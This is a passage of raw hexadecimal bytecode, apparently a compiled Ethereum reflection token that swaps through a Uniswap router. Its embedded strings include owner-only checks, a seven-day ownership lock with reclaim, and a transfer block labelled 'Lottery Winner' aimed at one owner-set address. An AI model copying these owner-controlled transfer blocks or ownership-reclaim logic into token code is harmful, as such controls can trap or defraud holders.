fffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16141580156110df5750600073ffffffffffffffffffffffffffffffffffffffff16601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b1561112a5782601460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506111ef565b601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156111ee576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252600e8152602001807f4c6f74746572792057696e6e657200000000000000000000000000000000000081525060200191505060405180910390fd5b5b6111fa848484613562565b6112bb84611206613363565b6112b68560405180606001604052806028815260200161552f60289139600660008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061126c613363565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546139259092919063ffffffff16565b61336b565b60019050611395565b6112cf848484613562565b611390846112db613363565b61138b8560405180606001604052806028815260200161552f60289139600660008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000611341613363565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546139259092919063ffffffff16565b61336b565b600190505b9392505050565b6000600b548211156113f9576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602a815260200180615474602a913960400191505060405180910390fd5b60006114036139e5565b90506114188184613a1090919063ffffffff16565b915050919050565b6000600f60009054906101000a900460ff16905090565b61143f613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146114ff576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600360009054906101000a900460ff161561151957600080fd5b6001600360006101000a81548160ff0219169083151502179055507ffe43f02325c7ba292731b549841a95357d1af4ac58107d8787d4dea129a77e3660405160405180910390a1565b61156a613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461162a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600860008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff166116e9576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601b8152602001807f4163636f756e7420697320616c7265616479206578636c75646564000000000081525060200191505060405180910390fd5b60005b6009805490508110156118e8578173ffffffffffffffffffffffffffffffffffffffff166009828154811061171d57fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614156118db5760096001600980549050038154811061177957fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600982815481106117b157fe5b9060005260206000200160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506000600860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555060098054806118a157fe5b6001900381819060005260206000200160006101000a81549073ffffffffffffffffffffffffffffffffffffffff021916905590556118e8565b80806001019150506116ec565b5050565b60006119956118f9613363565b84611990856006600061190a613363565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b61336b565b6001905092915050565b60105481565b60006119af613363565b9050600860008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615611a54576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602c8152602001806155c9602c913960400191505060405180910390fd5b6000611a5f83613ae2565b50505050509050611ab881600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611b1081600b54613b3e90919063ffffffff16565b600b81905550611b2b83600c54613a5a90919063ffffffff16565b600c81905550505050565b611b3e613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611bfe576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b6001600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b6000600a54831115611cd3576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601f8152602001807f416d6f756e74206d757374206265206c657373207468616e20737570706c790081525060200191505060405180910390fd5b81611cf3576000611ce384613ae2565b5050505050905080915050611d0a565b6000611cfe84613ae2565b50505050915050809150505b92915050565b7f00000000000000000000000061ef0db32bbc54a3326bb0072a00cf0284d7a34281565b601460159054906101000a900460ff1681565b611d4f613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611e0f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600860008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615611ecf576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601b8152602001807f4163636f756e7420697320616c7265616479206578636c75646564000000000081525060200191505060405180910390fd5b6000600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541115611fa357611f5f600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461139c565b600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b6001600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506009819080600181540180825580915050600190039060005260206000200160009091909190916101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60125481565b6000600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561215857600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490506121a3565b6121a0600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461139c565b90505b919050565b6121b0613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612270576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60155481565b61233c613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146123fc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600360009054906101000a900460ff1661241557600080fd5b6000600360006101000a81548160ff0219169083151502179055507f77a8d615db64246f476b7b2797d51b6aade4c0e00fb2f171e80881541858ecdb60405160405180910390a1565b6000600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6124e5613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146125a5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b8060128190555050565b6060600e8054600181600116156101000203166002900480601f0160208091040260200160405190810160405280929190818152602001828054600181600116156101000203166002900480156126475780601f1061261c57610100808354040283529160200191612647565b820191906000526020600020905b81548152906001019060200180831161262a57829003601f168201915b5050505050905090565b600061271461265e613363565b8461270f856040518060600160405280602581526020016156186025913960066000612688613363565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546139259092919063ffffffff16565b61336b565b6001905092915050565b3373ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146127c4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260238152602001806155f56023913960400191505060405180910390fd5b600254421161283b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601f8152602001807f436f6e7472616374206973206c6f636b656420756e74696c203720646179730081525060200191505060405180910390fd5b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b612943613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612a03576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b80601460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600060011515600360009054906101000a900460ff1615151415612b4457601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415612b29576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252600e8152602001807f4c6f74746572792057696e6e657200000000000000000000000000000000000081525060200191505060405180910390fd5b612b3b612b34613363565b8484613562565b60019050612b5b565b612b56612b4f613363565b8484613562565b600190505b92915050565b6000600254905090565b601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b612b99613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612c59576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b80601460156101000a81548160ff0219169083151502179055507f53726dfcaf90650aa7eb35524f4d3220f07413c8d6cb404cc8c18bf5591bc1598160405180821515815260200191505060405180910390a150565b600360009054906101000a900460ff1681565b612cca613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612d8a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b612db4620f4240612da683600a54613b8890919063ffffffff16565b613a1090919063ffffffff16565b60158190555050565b612dc5613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612e85576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b60008054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550804201600281905550600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a350565b6000600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b61303d613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146130fd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b6000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b613160613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614613220576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614156132a6576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602681526020018061549e6026913960400191505060405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156133f1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260248152602001806155a56024913960400191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415613477576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260228152602001806154c46022913960400191505060405180910390fd5b80600660008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040518082815260200191505060405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156135e8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260258152602001806155806025913960400191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561366e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260238152602001806154516023913960400191505060405180910390fd5b600081116136c7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260298152602001806155576029913960400191505060405180910390fd5b6136cf6124b4565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415801561373d575061370d6124b4565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b1561379e5760155481111561379d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260288152602001806154e66028913960400191505060405180910390fd5b5b60006137a9306120bd565b905060155481106137ba5760155490505b600060165482101590508080156137dc575060148054906101000a900460ff16155b801561383457507f00000000000000000000000061ef0db32bbc54a3326bb0072a00cf0284d7a34273ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b801561384c5750601460159054906101000a900460ff165b1561386057601654915061385f82613c0e565b5b600060019050600760008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806139075750600760008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b1561391157600090505b61391d86868684613cee565b505050505050565b60008383111582906139d2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825283818151815260200191508051906020019080838360005b8381101561399757808201518184015260208101905061397c565b50505050905090810190601f1680156139c45780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b5060008385039050809150509392505050565b60008060006139f2613fff565b91509150613a098183613a1090919063ffffffff16565b9250505090565b6000613a5283836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250614290565b905092915050565b600080828401905083811015613ad8576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601b8152602001807f536166654d6174683a206164646974696f6e206f766572666c6f77000000000081525060200191505060405180910390fd5b8091505092915050565b6000806000806000806000806000613af98a614356565b9250925092506000806000613b178d8686613b126139e5565b6143b0565b9250925092508282828888889b509b509b509b509b509b5050505050505091939550919395565b6000613b8083836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250613925565b905092915050565b600080831415613b9b5760009050613c08565b6000828402905082848281613bac57fe5b0414613c03576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602181526020018061550e6021913960400191505060405180910390fd5b809150505b92915050565b60016014806101000a81548160ff0219169083151502179055506000613c3e600283613a1090919063ffffffff16565b90506000613c558284613b3e90919063ffffffff16565b90506000479050613c6583614439565b6000613c7a8247613b3e90919063ffffffff16565b9050613c8683826146e7565b7f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb56184828560405180848152602001838152602001828152602001935050505060405180910390a15050505060016014806101000a81548160ff02191690831515021790555050565b80613cfc57613cfb614838565b5b600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015613d9f5750600860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15613db457613daf84848461487b565b613feb565b600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015613e575750600860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15613e6c57613e67848484614adb565b613fea565b600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015613f105750600860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15613f2557613f20848484614d3b565b613fe9565b600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015613fc75750600860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15613fdc57613fd7848484614f06565b613fe8565b613fe7848484614d3b565b5b5b5b5b80613ff957613ff86151fb565b5b50505050565b6000806000600b5490506000600a54905060005b6009805490508110156142535782600460006009848154811061403257fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054118061411957508160056000600984815481106140b157fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054115b1561413057600b54600a549450945050505061428c565b6141b9600460006009848154811061414457fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205484613b3e90919063ffffffff16565b925061424460056000600984815481106141cf57fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205483613b3e90919063ffffffff16565b91508080600101915050614013565b5061426b600a54600b54613a1090919063ffffffff16565b82101561428357600b54600a5493509350505061428c565b81819350935050505b9091565b6000808311829061433c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825283818151815260200191508051906020019080838360005b838110156143015780820151818401526020810190506142e6565b50505050905090810190601f16801561432e5780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b50600083858161434857fe5b049050809150509392505050565b6000806000806143658561520f565b9050600061437286615240565b9050600061439b8261438d858a613b3e90919063ffffffff16565b613b3e90919063ffffffff16565b90508083839550955095505050509193909250565b6000806000806143c98589613b8890919063ffffffff16565b905060006143e08689613b8890919063ffffffff16565b905060006143f78789613b8890919063ffffffff16565b90506000614420826144128587613b3e90919063ffffffff16565b613b3e90919063ffffffff16565b9050838184965096509650505050509450945094915050565b6060600267ffffffffffffffff8111801561445357600080fd5b506040519080825280602002602001820160405280156144825781602001602082028036833780820191505090505b509050308160008151811061449357fe5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b815260040160206040518083038186803b15801561453357600080fd5b505afa158015614547573d6000803e3d6000fd5b505050506040513d602081101561455d57600080fd5b81019080805190602001909291905050508160018151811061457b57fe5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250506145e0307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d8461336b565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b815260040180868152602001858152602001806020018473ffffffffffffffffffffffffffffffffffffffff168152602001838152602001828103825285818151815260200191508051906020019060200280838360005b838110156146a2578082015181840152602081019050614687565b505050509050019650505050505050600060405180830381600087803b1580156146cb57600080fd5b505af11580156146df573d6000803e3d6000fd5b505050505050565b614712307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d8461336b565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663f305d71982308560008061475c6124b4565b426040518863ffffffff1660e01b8152600401808773ffffffffffffffffffffffffffffffffffffffff1681526020018681526020018581526020018481526020018373ffffffffffffffffffffffffffffffffffffffff16815260200182815260200196505050505050506060604051808303818588803b1580156147e157600080fd5b505af11580156147f5573d6000803e3d6000fd5b50505050506040513d606081101561480c57600080fd5b810190808051906020019092919080519060200190929190805190602001909291905050505050505050565b600060105414801561484c57506000601254145b1561485657614879565b601054601181905550601254601381905550600060108190555060006012819055505b565b60008060008060008061488d87613ae2565b9550955095509550955095506148eb87600560008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600560008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061498086600460008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614a1585600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600460008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614a6181615271565b614a6b8483615416565b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040518082815260200191505060405180910390a3505050505050505050565b600080600080600080614aed87613ae2565b955095509550955095509550614b4b86600460008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614be083600560008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600560008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614c7585600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600460008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614cc181615271565b614ccb8483615416565b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040518082815260200191505060405180910390a3505050505050505050565b600080600080600080614d4d87613ae2565b955095509550955095509550614dab86600460008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614e4085600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600460008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614e8c81615271565b614e968483615416565b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040518082815260200191505060405180910390a3505050505050505050565b600080600080600080614f1887613ae2565b955095509550955095509550614f7687600560008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600560008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061500b86600460008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506150a083600560008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600560008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061513585600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600460008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160